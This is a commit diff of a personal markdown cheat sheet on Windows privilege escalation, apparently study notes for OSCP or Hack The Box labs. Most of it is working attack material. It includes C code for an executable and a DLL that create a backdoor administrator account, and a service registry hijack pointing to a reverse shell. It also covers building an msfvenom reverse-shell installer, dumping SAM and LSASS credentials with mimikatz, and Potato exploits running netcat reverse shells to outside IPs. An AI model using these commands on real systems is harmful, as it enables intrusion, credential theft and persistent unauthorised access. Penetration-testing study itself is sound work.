markdown/WindowsPrivilegeEscalation.md, before:

---
layout: blank
pagetitle: Windows Privilege Escalation
---

[HTB Windows Privesc Checklist](https://khaelkugler.com/pdf/Windows_Privilege_Escalation_Module_Cheat_Sheet.pdf)


## Enumerating Windows

**Windows Privilege and Access Control**
- Secure Identifier (SID)
	- Value assigned to each entity
	- Generated by Local Security Authority for local users and on the DC for domain users
	- SID looks like this: `S-R-X-Y` 
		- S indicates an SID
		- R is for revision and is always 1
		- X determines the identity authority (who gave authority) - 5 is *NT Authority*
		- Y is a bunch of number strings indicating the sub authorities of the entity
			- Example: S-1-5-21-1336799502-1441772794-948155058-1001
				- RID is 1001, indicating second local user created
		- S-1-0-0 = Nobody, S-1-1-0 = Everybody, S-1-5-11 = Authenticated Users,  S-1-5-18 = Local system, S-1-5-{domainidentifier}-500 = Administrator
- Once a user authenticates, they are granted an access token containing the security context
- Security context
	- Contains the SID, SIDs of the user's groups, user and group privileges, and scope info
- Integrity Control
	- There are four integrity levels
		- System: SYSTEM (kernel) 
		- High: Elevated users 
		- Medium: Standard users 
		- Low: very restricted rights
- User Account Control (UAC)
	- Windows runs most applications with user privileges (even as Administrator)
	- Running programs as Administrator requires a UAC prompt

**Collecting Environment Data**
- Generally try to collect:
	- Username/hostname - `whoami`
	- Group memberships of user - `Get-LocalGroup`
	- Existing users/groups - `Get-LocalGroupMember {group name}`
	- OS version and arch - `systeminfo`
	- Network Information - `ipconfig /all`, `route print`, `netstat -ano or -q`
	- Installed Applications - `Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node{can_be_removed}\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname` - displays all removable applications 
		- Can remove `select displayname` to return all info, like file path
	- Running Processes - `Get-Process`
		- `Get-Process | Select ProcessName,Path`
	- Environment Variables!!
		- `Get-ChildItem Env:`

**Searching for Sensitive Information**
- Check common folders for passwords - it's pretty common (can use functions below)
	- Check hidden directories/files with `{dir/ls} -force`
- Example: search XAMPP for config files (could also do keepass databases or the like):
	- `Get-ChildItem -Path C:\Users -Include *.txt, *.ini, -File -Recurse -ErrorAction SilentlyContinue -force`
- Search contents of files
	- `findstr /si {password/pass/pwd/cred/vnc} *.{txt/ini/xml/config}`
- Using sensitive information
	- Runas - can run commands as a privileged user - this is basically sudo
		- `runas /user:{username} {program, like powershell.exe}`

**Find sensitive PowerShell information**
- Looking for *PowerShell Transcription* and *PowerShell Script Block Logging*
	- First basically logs every powershell command entered in plaintext, the second records commands and blocks of script code while executing
	- This would be pretty fucking awesome at CCDC as a red teamer, lol
- ``(Get-PSReadlineOption).HistorySavePath`` - ENTIRE PowerShell history
- Event Viewer + Script Block Logging
	- Go to `Applications and Services Logs > Microsoft > Windows > PowerShell > Operational` and scroll through logs
- Evil-WinRM
	- Basically a better shell that provides pass-the-hash, in-memory loading, file upload/download, etc. from kali
	- Download a file with `download {filename}`
	- Upload a file with `upload {filename}`
	- `evil-winrm -i {IP} -u {username} -p {password}`
	- Can also be provided keys
		- `evil-winrm -i {IP} -c certificate.pem -k priv-key.pem -S`

**Automated tools**
- winPEAS lol
	- `winpeas.exe --fileanalysis` to analyze files
	- available at `https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe`
	- host it, download it, run it
	- Can miss stuff, and knowing OSCP it will. 
- PowerUp powershell script
	- https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
- Seatbelt
	- https://github.com/GhostPack/Seatbelt

## Leveraging Windows Services

**Hijacking Service Binaries**
- `Get-CimInstance`to query services of WMI (Windows Management Instrumentation) class
	- `Get-CimInstance -ClassName win32_service | Select Name,State,Pathname | Where-Object {$_.State -like 'Running'}`
	- PowerUp.ps1 (https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) can also identify these (among others)
- Check the permissions of the service binaries with `icacls` or `Get-ACL`
	- `icacls "{executable path}"`
	- F - Full access
	- M - Modify Access
	- RX - Read/execute access (this is too low)
	- R - Read-only access
	- W - Write only access
- If a user has full control over a binary with higher permissions (like a MySQL daemon), we can edit the executable and it will be run with higher permissions
	- This can occur due to full permissions being an easy solution for sysadmins
	- This binary can be as simple as creating an administrative user with `system()`
	- `sudo apt install mingw-w64`
	- `x86_64-w64-mingw32-gcc newuser.c -o newuser.exe`
		- `python3 -m http.server`
		- `iwr -uri http://{kali_IP}:8000/newuser.exe -Outfile newuser.exe`
		
```
#include <stdlib.h>
int main ()
{
  int i;
  
  i = system ("net user kali Password123! /add");
  i = system ("net localgroup administrators kali /add");
  i = system ("net localgroup "Remote Desktop Users" kali /add");
  
  return 0;
}
```
- Then, move the normal executable out from it's usual location, move ours in, and then figure out how to restart the service (so it uses the exe)
- Restarting the service
	- Could be as simple as `net stop {service}`, but access will likely be denied
	- If the service's `StartMode` is set to "Auto", we can reboot the system (if permissions allow)
		- shutdown /r /t 0

**Hijacking Service DLLs**
- Similar to hijacking binaries, can replace DLL with malicious code
- Searching for DLLs:
	- `Get-ItemProperty "HKLM:\SOFTWARE\(optional)Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname` to find installed software
	- The versions of this software could be vulnerable to DLL hijacking (search it up)
- Can also replace missing DLLs with malicious ones
	- This can be useful when we find a binary we can't modify that loads a missing DLL
		- Will likely be looked for in a PATH location (check with `$env:path`), so we put it there
	- We can find missing DLLs by copying user executables to our machine and checking them out with Process Monitor
- When making the DLL, we can again simply add an administrative user to the system using something like the following inside of `case DLL_PROCESS_ATTACH`:
	- `int i; i = system("net user /ADD tempuser"); i = system("net localgroups administrators /ADD tempuser"); break;`
	- MinGW can compile C++ code into DLLs with the `--shared` flag
		- `x86_64-w64-mingw32-gcc dll.cpp --shared -o dll.dll`

```
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user kali kali123! /add");
  	    i = system ("net localgroup administrators kali /add");
  	    i = system ("net localgroup "Remote Desktop Users" kali /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}
```

**.bat files**
- Just call an executable inside the batch file

```
C:\Users\Public\reverseshell.exe
```

**Abusing Unquoted Service Paths**
- This occurs when we can write to a service's main directory without being able to modify the current files
- Can again be found using `wmic` in cmd: 
	- `wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """`
	- These will list potentially vulnerable paths
- Abusing this:
	- Let's say a service path is in use like "C:\\Program Files\\Enterprise Agents\\Company Files\\GammaServ.exe"
	- Windows will first check for "C:\\Program.exe", then "C:\\Program Files\\Enterprise.exe", then "C:\\Program Files\\Enterprise Agents\\Company.exe", and finally "C:\\Program Files\\Enterprise Agents\\Company Files\\GammaServ.exe"
		- If we can write to the "C:\\Program Files\\Enterprise Agents\\" directory, we can make an executable called Company.exe, which will be used before the real one
	- Then, restart the service

## Abusing Other Windows Components

**Living off of the Land**
- [LOLBAS](https://lolbas-project.github.io/#) is a great resource similar to gtfobins
- Microsoft signed files that have extra, unexpected functionality, such as:
  - Executing code
  - Compiling code
  - File operations
  - Persistence
  - UAC bypass
  - Credential theft
  - Dumping process memory
  - Surveillance
  - Log evasion
  - DLL side-loading/hijacking without relocation

**Using Scheduled Tasks**
- Need to know who runs the scheduled tasks, what triggers are required, and what the tasks do
- View scheduled tasks with `Get-ScheduledTask` or `schtasks /query /fo LIST /v`
	- This is a shit ton of info, pipe it into a text file and search through it
		- Can search for `{workgroup}\`, which will return things authored by people like `CLIENTWK220\daveadmin`
	- Check author of scheduled tasks, tasks to run, and next run time
		- Sometimes, privileged authors can put the executables in modifiable locations
		- Thus, if we replace it, it will be run as a privileged user on next run time
- Get startup tasks: `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp`

**Registry**
- WinPEAS will output controllable Registry entries, look for
	- `HKLM\system\currentcontrolset\services\<service> (Interactive [FullControl])`
- Autorun:
	- `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
	- `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
- Can check perms with `accesschk \accepteula -uvwqk "{path}"`
	- https://download.sysinternals.com/files/AccessChk.zip
- `reg query {registry_path}`
- `reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v {file_path_entry} /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f`
- AlwaysInstallElevated
	- `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
	- `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
	- If one of these works, do
		- `msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={port} --platform windows -f msi > reverse.msi`
		- `msiexec /quiet /qn /i reverse.msi`

**Abusing Privileges to Execute Code as Privileged Users**
- Can either exploit applications, the kernel, or abuse privileges we have
- `whoami /priv`
- Privilege Abuse:
	- If we have `SeImpersonatePrivilege`, `SeBackupPrivilege`, `SeAssignPrimaryToken`, `SeLoadDriver`, `SeTakeOwnershipPrivilege` or `SeDebugPrivilege`, we can sometimes perform operations in the security context of another user
		- With the `SeBackupPrivilege` and `SeRestorePrivilege`, we can read arbitrary files with robocopy: `robocopy /b C:\<path to file> .\<filename>`
			- We can also just privesc via the following:
			- `reg save hklm\sam C:\Users\{current_user}\sam`
			- `reg save hklm\system C:\Users\{current_user}\system`
				- The SAM and SYSTEM will usually be located here:
					- C:\Windows\repair\SAM
					- C:\Windows\System32\config\RegBack\SAM
					- C:\Windows\System32\config\SAM
					- Can search with `dir /s {SAM/SYSTEM}`
			- `impacket-secretsdump -sam sam -system system LOCAL`
		- Use [SharpUp](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/SharpUp.exe) to determine which privileges are abusable
		- With `SeDebugPrivilege`
			- `procdump.exe -accepteula -ma lsass.exe lsass.dmp`
			- Then, run `mimikatz` (run log so output is in txt) and run `sekurlsa::minidump lsass.dmp`
		- With `SeTakeOwnershipPrivilege`
			- Outlined here: https://academy.hackthebox.com/module/67/section/642
	- Named pipes:
		- Allow unrelated processes to share data between each other
		- If we can coerce a a privileged process into connecting to a controlled named pipe, we can capture the authentication and use `SeImpersonatePrivilege` to impersonate the user account and perform operations in their security context
		- Sigma Potato (PrintSpoofer)
			- Coerces NT AUTHORITY/SYSTEM into a named pipe
			- Must be downloaded somehow
			- Can be used when we have a user with `SeImpersonatePrivilege`
			- `wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe`
			- `.\PrintSpoofer64.exe -i -c powershell.exe`
	- General Potato information:
		- https://jlajara.gitlab.io/Potatoes_Windows_Privesc
	- SweetPotato
		- https://github.com/CCob/SweetPotato
			- Precompiled: https://github.com/uknowsec/SweetPotato
		- Get netcat as well (`/usr/share/windows-resources/binaries/)
		- `.\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "10.10.10.10 1234 -e cmd"` works pretty well
	- JuicyPotato
		- https://github.com/ohpe/juicy-potato/releases/tag/v0.1
		- `C:\Users\Public\JuicyPotato.exe -l 1337 -p C:\Windows\system32\cmd.exe -a "/c C:\Users\Public\nc.exe 10.10.14.235 4444 -e cmd.exe" -t *`
	- GodPotato
		- Can use for a reverse shell `GodPotato.exe -cmd "cmd /c reverse.exe"`
			- `GodPotato.exe -cmd "powershell -e ...."`
		- Can also use it to create a new administrative user, then rdp/winrm in

Commit message:

added notes after compiling sweet potato

markdown/WindowsPrivilegeEscalation.md, after:

---
layout: blank
pagetitle: Windows Privilege Escalation
---

[HTB Windows Privesc Checklist](https://khaelkugler.com/pdf/Windows_Privilege_Escalation_Module_Cheat_Sheet.pdf)


## Enumerating Windows

**Windows Privilege and Access Control**
- Secure Identifier (SID)
	- Value assigned to each entity
	- Generated by Local Security Authority for local users and on the DC for domain users
	- SID looks like this: `S-R-X-Y` 
		- S indicates an SID
		- R is for revision and is always 1
		- X determines the identity authority (who gave authority) - 5 is *NT Authority*
		- Y is a bunch of number strings indicating the sub authorities of the entity
			- Example: S-1-5-21-1336799502-1441772794-948155058-1001
				- RID is 1001, indicating second local user created
		- S-1-0-0 = Nobody, S-1-1-0 = Everybody, S-1-5-11 = Authenticated Users,  S-1-5-18 = Local system, S-1-5-{domainidentifier}-500 = Administrator
- Once a user authenticates, they are granted an access token containing the security context
- Security context
	- Contains the SID, SIDs of the user's groups, user and group privileges, and scope info
- Integrity Control
	- There are four integrity levels
		- System: SYSTEM (kernel) 
		- High: Elevated users 
		- Medium: Standard users 
		- Low: very restricted rights
- User Account Control (UAC)
	- Windows runs most applications with user privileges (even as Administrator)
	- Running programs as Administrator requires a UAC prompt

**Collecting Environment Data**
- Generally try to collect:
	- Username/hostname - `whoami`
	- Group memberships of user - `Get-LocalGroup`
	- Existing users/groups - `Get-LocalGroupMember {group name}`
	- OS version and arch - `systeminfo`
	- Network Information - `ipconfig /all`, `route print`, `netstat -ano or -q`
	- Installed Applications - `Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node{can_be_removed}\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname` - displays all removable applications 
		- Can remove `select displayname` to return all info, like file path
	- Running Processes - `Get-Process`
		- `Get-Process | Select ProcessName,Path`
	- Environment Variables!!
		- `Get-ChildItem Env:`

**Searching for Sensitive Information**
- Check common folders for passwords - it's pretty common (can use functions below)
	- Check hidden directories/files with `{dir/ls} -force`
- Example: search XAMPP for config files (could also do keepass databases or the like):
	- `Get-ChildItem -Path C:\Users -Include *.txt, *.ini, -File -Recurse -ErrorAction SilentlyContinue -force`
- Search contents of files
	- `findstr /si {password/pass/pwd/cred/vnc} *.{txt/ini/xml/config}`
- Using sensitive information
	- Runas - can run commands as a privileged user - this is basically sudo
		- `runas /user:{username} {program, like powershell.exe}`

**Find sensitive PowerShell information**
- Looking for *PowerShell Transcription* and *PowerShell Script Block Logging*
	- First basically logs every powershell command entered in plaintext, the second records commands and blocks of script code while executing
	- This would be pretty fucking awesome at CCDC as a red teamer, lol
- ``(Get-PSReadlineOption).HistorySavePath`` - ENTIRE PowerShell history
- Event Viewer + Script Block Logging
	- Go to `Applications and Services Logs > Microsoft > Windows > PowerShell > Operational` and scroll through logs
- Evil-WinRM
	- Basically a better shell that provides pass-the-hash, in-memory loading, file upload/download, etc. from kali
	- Download a file with `download {filename}`
	- Upload a file with `upload {filename}`
	- `evil-winrm -i {IP} -u {username} -p {password}`
	- Can also be provided keys
		- `evil-winrm -i {IP} -c certificate.pem -k priv-key.pem -S`

**Automated tools**
- winPEAS lol
	- `winpeas.exe --fileanalysis` to analyze files
	- available at `https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe`
	- host it, download it, run it
	- Can miss stuff, and knowing OSCP it will. 
- PowerUp powershell script
	- https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
- Seatbelt
	- https://github.com/GhostPack/Seatbelt

## Leveraging Windows Services

**Hijacking Service Binaries**
- `Get-CimInstance`to query services of WMI (Windows Management Instrumentation) class
	- `Get-CimInstance -ClassName win32_service | Select Name,State,Pathname | Where-Object {$_.State -like 'Running'}`
	- PowerUp.ps1 (https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) can also identify these (among others)
- Check the permissions of the service binaries with `icacls` or `Get-ACL`
	- `icacls "{executable path}"`
	- F - Full access
	- M - Modify Access
	- RX - Read/execute access (this is too low)
	- R - Read-only access
	- W - Write only access
- If a user has full control over a binary with higher permissions (like a MySQL daemon), we can edit the executable and it will be run with higher permissions
	- This can occur due to full permissions being an easy solution for sysadmins
	- This binary can be as simple as creating an administrative user with `system()`
	- `sudo apt install mingw-w64`
	- `x86_64-w64-mingw32-gcc newuser.c -o newuser.exe`
		- `python3 -m http.server`
		- `iwr -uri http://{kali_IP}:8000/newuser.exe -Outfile newuser.exe`
		
```
#include <stdlib.h>
int main ()
{
  int i;
  
  i = system ("net user kali Password123! /add");
  i = system ("net localgroup administrators kali /add");
  i = system ("net localgroup "Remote Desktop Users" kali /add");
  
  return 0;
}
```
- Then, move the normal executable out from it's usual location, move ours in, and then figure out how to restart the service (so it uses the exe)
- Restarting the service
	- Could be as simple as `net stop {service}`, but access will likely be denied
	- If the service's `StartMode` is set to "Auto", we can reboot the system (if permissions allow)
		- shutdown /r /t 0

**Hijacking Service DLLs**
- Similar to hijacking binaries, can replace DLL with malicious code
- Searching for DLLs:
	- `Get-ItemProperty "HKLM:\SOFTWARE\(optional)Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname` to find installed software
	- The versions of this software could be vulnerable to DLL hijacking (search it up)
- Can also replace missing DLLs with malicious ones
	- This can be useful when we find a binary we can't modify that loads a missing DLL
		- Will likely be looked for in a PATH location (check with `$env:path`), so we put it there
	- We can find missing DLLs by copying user executables to our machine and checking them out with Process Monitor
- When making the DLL, we can again simply add an administrative user to the system using something like the following inside of `case DLL_PROCESS_ATTACH`:
	- `int i; i = system("net user /ADD tempuser"); i = system("net localgroups administrators /ADD tempuser"); break;`
	- MinGW can compile C++ code into DLLs with the `--shared` flag
		- `x86_64-w64-mingw32-gcc dll.cpp --shared -o dll.dll`

```
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user kali kali123! /add");
  	    i = system ("net localgroup administrators kali /add");
  	    i = system ("net localgroup "Remote Desktop Users" kali /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}
```

**.bat files**
- Just call an executable inside the batch file

```
C:\Users\Public\reverseshell.exe
```

**Abusing Unquoted Service Paths**
- This occurs when we can write to a service's main directory without being able to modify the current files
- Can again be found using `wmic` in cmd: 
	- `wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """`
	- These will list potentially vulnerable paths
- Abusing this:
	- Let's say a service path is in use like "C:\\Program Files\\Enterprise Agents\\Company Files\\GammaServ.exe"
	- Windows will first check for "C:\\Program.exe", then "C:\\Program Files\\Enterprise.exe", then "C:\\Program Files\\Enterprise Agents\\Company.exe", and finally "C:\\Program Files\\Enterprise Agents\\Company Files\\GammaServ.exe"
		- If we can write to the "C:\\Program Files\\Enterprise Agents\\" directory, we can make an executable called Company.exe, which will be used before the real one
	- Then, restart the service

## Abusing Other Windows Components

**Living off of the Land**
- [LOLBAS](https://lolbas-project.github.io/#) is a great resource similar to gtfobins
- Microsoft signed files that have extra, unexpected functionality, such as:
  - Executing code
  - Compiling code
  - File operations
  - Persistence
  - UAC bypass
  - Credential theft
  - Dumping process memory
  - Surveillance
  - Log evasion
  - DLL side-loading/hijacking without relocation

**Using Scheduled Tasks**
- Need to know who runs the scheduled tasks, what triggers are required, and what the tasks do
- View scheduled tasks with `Get-ScheduledTask` or `schtasks /query /fo LIST /v`
	- This is a shit ton of info, pipe it into a text file and search through it
		- Can search for `{workgroup}\`, which will return things authored by people like `CLIENTWK220\daveadmin`
	- Check author of scheduled tasks, tasks to run, and next run time
		- Sometimes, privileged authors can put the executables in modifiable locations
		- Thus, if we replace it, it will be run as a privileged user on next run time
- Get startup tasks: `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp`

**Registry**
- WinPEAS will output controllable Registry entries, look for
	- `HKLM\system\currentcontrolset\services\<service> (Interactive [FullControl])`
- Autorun:
	- `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
	- `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
- Can check perms with `accesschk \accepteula -uvwqk "{path}"`
	- https://download.sysinternals.com/files/AccessChk.zip
- `reg query {registry_path}`
- `reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v {file_path_entry} /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f`
- AlwaysInstallElevated
	- `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
	- `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
	- If one of these works, do
		- `msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={port} --platform windows -f msi > reverse.msi`
		- `msiexec /quiet /qn /i reverse.msi`

**Abusing Privileges to Execute Code as Privileged Users**
- Can either exploit applications, the kernel, or abuse privileges we have
- `whoami /priv`
- Privilege Abuse:
	- If we have `SeImpersonatePrivilege`, `SeBackupPrivilege`, `SeAssignPrimaryToken`, `SeLoadDriver`, `SeTakeOwnershipPrivilege` or `SeDebugPrivilege`, we can sometimes perform operations in the security context of another user
		- With the `SeBackupPrivilege` and `SeRestorePrivilege`, we can read arbitrary files with robocopy: `robocopy /b C:\<path to file> .\<filename>`
			- We can also just privesc via the following:
			- `reg save hklm\sam C:\Users\{current_user}\sam`
			- `reg save hklm\system C:\Users\{current_user}\system`
				- The SAM and SYSTEM will usually be located here:
					- C:\Windows\repair\SAM
					- C:\Windows\System32\config\RegBack\SAM
					- C:\Windows\System32\config\SAM
					- Can search with `dir /s {SAM/SYSTEM}`
			- `impacket-secretsdump -sam sam -system system LOCAL`
		- Use [SharpUp](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/SharpUp.exe) to determine which privileges are abusable
		- With `SeDebugPrivilege`
			- `procdump.exe -accepteula -ma lsass.exe lsass.dmp`
			- Then, run `mimikatz` (run log so output is in txt) and run `sekurlsa::minidump lsass.dmp`
		- With `SeTakeOwnershipPrivilege`
			- Outlined here: https://academy.hackthebox.com/module/67/section/642
	- Named pipes:
		- Allow unrelated processes to share data between each other
		- If we can coerce a a privileged process into connecting to a controlled named pipe, we can capture the authentication and use `SeImpersonatePrivilege` to impersonate the user account and perform operations in their security context
			- SweetPotato can be used to reliably exploit this it seems; use the nc reverse shell below
	- General Potato information:
		- https://jlajara.gitlab.io/Potatoes_Windows_Privesc
	- SweetPotato
		- Apparently just the best potato
		- https://github.com/CCob/SweetPotato
			- Compiled pretty painlessly after cloning the repo in Visual Studio 2022
		- `.\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "10.10.10.10 1234 -e cmd"` works pretty well
	- JuicyPotato
		- https://github.com/ohpe/juicy-potato/releases/tag/v0.1
		- `C:\Users\Public\JuicyPotato.exe -l 1337 -p C:\Windows\system32\cmd.exe -a "/c {nc.exe_path} {kali_IP} {kali_port} -e cmd.exe" -t *`
	- GodPotato
		- Can use for a reverse shell `GodPotato.exe -cmd "cmd /c reverse.exe"`
			- `GodPotato.exe -cmd "powershell -e ...."`
		- Can also use it to create a new administrative user, then rdp/winrm in
	- Sigma Potato (PrintSpoofer)
		- Coerces NT AUTHORITY/SYSTEM into a named pipe
		- Can be used when we have a user with `SeImpersonatePrivilege`
		- `wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe`
		- `.\PrintSpoofer64.exe -i -c powershell.exe`
